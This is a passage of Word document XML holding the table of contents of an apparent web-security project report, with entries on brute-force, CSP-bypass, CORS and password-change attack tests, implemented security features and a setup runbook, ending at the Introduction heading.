            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584809" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>iii.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Brute Force Attack on Login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584809 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6272535A" w14:textId="5B3A1F3A" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584810" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>iv.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSP Bypass, Inline Script Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584810 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56F48C98" w14:textId="532045FB" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584811" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>v.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unsafe CORS Misconfigurations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584811 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7EC28872" w14:textId="1030F35E" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584812" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vi.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Password Change Exploit Attempt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584812 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07F96678" w14:textId="14BF5979" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584813" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Security Features Implemented</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584813 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05DCB030" w14:textId="7F31325F" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584814" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Runbook (Step-by-Step-Guide)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584814 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E5FC374" w14:textId="7C628D84" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584815" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Backend Setup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584815 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3ADA24D0" w14:textId="738C7D09" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584816" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ii.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Frontend Setup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584816 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DC31A26" w14:textId="429E8AAC" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584817" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>iii.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test Scenarios</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584817 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20CF14CC" w14:textId="0596AC4F" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584818" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584818 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="435DACA7" w14:textId="0C52778F" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584819" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584819 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28D1A506" w14:textId="0A8DA8ED" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="556E9595" w14:textId="77777777" w:rsidR="00FC5B42" w:rsidRPr="004E318F" w:rsidRDefault="00FC5B42" w:rsidP="00FC5B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C93D227" w14:textId="77777777" w:rsidR="00FC5B42" w:rsidRPr="004E318F" w:rsidRDefault="00FC5B42" w:rsidP="00FC5B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F148DC" w14:textId="77777777" w:rsidR="00FC5B42" w:rsidRDefault="00FC5B42" w:rsidP="00FC5B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC01E90" w14:textId="77777777" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="00FC5B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D59CAF" w14:textId="77777777" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="00FC5B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1031BE18" w14:textId="77777777" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="00FC5B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3309AFAA" w14:textId="77777777" w:rsidR="008907AE" w:rsidRPr="004E318F" w:rsidRDefault="008907AE" w:rsidP="00FC5B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58733280" w14:textId="198447C4" w:rsidR="00FC5B42" w:rsidRPr="008907AE" w:rsidRDefault="00FC5B42" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc214584795"/>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
